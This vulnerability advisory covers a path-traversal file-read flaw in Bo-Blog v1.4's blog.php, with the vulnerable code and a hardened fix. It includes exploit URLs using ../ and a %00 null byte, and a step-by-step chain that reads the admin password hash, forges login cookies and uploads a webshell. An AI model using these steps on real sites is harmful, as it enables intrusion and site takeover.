Bo-Blog v1.4 single-user classification list file read vulnerability + WebShell

Source: Internet
Author: User

A few days ago I came across this program and did some digging into it (I think there are still some people using this blog program from 2004, though this student has since switched to another blog program). A few vulnerabilities were dug up. Besides this one, the program also has several XSS issues (take the cookie and go straight to a shell, see below), file inclusion, configuration file writing, file reading......

Because this system has no database, it stores all kinds of data as plain text. Posts and messages are stored directly in "*.php" files......, fortunately the filtering there is relatively strict, otherwise Shell and ,..

By: Nuclear

Vulnerability Name:

Bo-Blog v1.4 single-user classification list file read vulnerability + WebShell

Vulnerability files:

blog.php

Vulnerability code:

if ($job == "showcat") { // list all entries under a category
    if (!file_exists("$dirblog/$cat.php")) {
        wronginfo("This category is not found.");
    }
    unset($allfiles);
    // $cat comes straight from the request; nothing filters it before it is used in the path
    $allfiles = @file("$dirblog/$cat.php");

Condition of exploits:

None

Cause:

The affected code is the "category list" function (job=showcat) in the file "blog.php".

The parameter "cat" is not sanitized: it is passed straight into the path used by "$allfiles = @file("$dirblog/$cat.php");", which reads the file.

As a result, whatever file name is submitted in "cat" is read and its contents are output directly as if they were category entries.
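As an added example (not Bo-Blog's own code), the following is a hardened replacement for the showcat branch shown above; $dirblog, $cat and wronginfo() are taken from the advisory, while load_category_lines() is an assumed helper name.

```php
<?php
// Added example, not Bo-Blog's own code: a hardened replacement for the
// "showcat" branch of blog.php. $dirblog, $cat and wronginfo() come from
// the advisory; load_category_lines() is an assumed helper name.

// Returns the lines of the category file for $cat, or null when $cat is
// not an acceptable category name or does not resolve to a file inside
// $dirblog.
function load_category_lines(string $dirblog, string $cat): ?array
{
    // 1. Allow-list the category name: letters, digits, underscore, hyphen.
    //    "../", "/", "\0" (the %00 in the advisory's test URL) and every
    //    other path metacharacter are rejected outright. \z (not $) so a
    //    trailing newline cannot slip through.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\z/', $cat)) {
        return null;
    }

    // 2. Resolve both paths and confirm the target really lives inside the
    //    blog directory (defence in depth if the allow-list is ever relaxed).
    $base = realpath($dirblog);
    $path = realpath($dirblog . DIRECTORY_SEPARATOR . $cat . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }

    // 3. Only now read the file, without the error-suppressing "@", so a
    //    read failure is reported rather than silently swallowed.
    $lines = file($path, FILE_IGNORE_NEW_LINES);
    return $lines === false ? null : $lines;
}

// Request handling, replacing the original showcat branch.
if (isset($_GET['job']) && $_GET['job'] === 'showcat') {
    $lines = load_category_lines($dirblog, (string)($_GET['cat'] ?? ''));
    if ($lines === null) {
        wronginfo("This category is not found."); // error page, as before
    } else {
        $allfiles = $lines;
    }
}
```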

Vulnerability Testing:

1. Read index.htm: http://www.bkjia.com/blog.php?job=showcat&cat=../index.htm%00 (the trailing %00 terminates the path string, so the ".php" suffix appended by the code is ignored)

Vulnerability exploitation:

1. Read $dirblog/userid.php: http://www.bkjia.com/blog.php?job=showcat&cat=userid

2. Read /diruser/userid.php: http://www.bkjia.com/blog.php?job=showcat&cat=../diruser/userid

You can exploit this vulnerability to obtain WebShell directly. The procedure is as follows:

1. Access http://www.bkjia.com/blog.php?job=showcat&cat=../diruser/userid (or http://www.bkjia.com/blog.php?job=showcat&cat=userid, depending on the path configured for the blog) to obtain the administrator password hash.

2. Access http://www.bkjia.com/profile.php to obtain the administrator account name.

3. Because this program stores the account name and the administrator password hash in cookies for login verification, you can log in directly with the account name and the hash, without cracking it.

4. Set the cookies: lastvisit=lastvisit; nowuserid=<administrator ID>; nowuserpassword=<administrator password hash>

5. Refresh the page; you are now logged in. Then access http://www.bkjia.com/mblog_upload.php, where any file can be uploaded, giving a WebShell.

Other information:

None
